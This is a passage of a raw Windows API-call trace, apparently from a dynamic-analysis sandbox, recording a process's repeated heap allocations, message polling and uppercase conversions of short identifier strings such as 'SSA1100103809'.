lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.707] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd39f) returned 0x2a7a130 [0089.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0089.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd39f) returned 0x2a94880 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0089.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0089.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0089.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0089.710] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0089.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0089.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0089.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0089.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0089.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0089.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0089.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0089.714] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0089.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0089.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0089.714] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0089.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0089.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0089.825] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0089.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0089.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0089.825] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0089.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0089.825] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0089.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0089.826] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0089.826] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0089.826] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0089.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0089.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 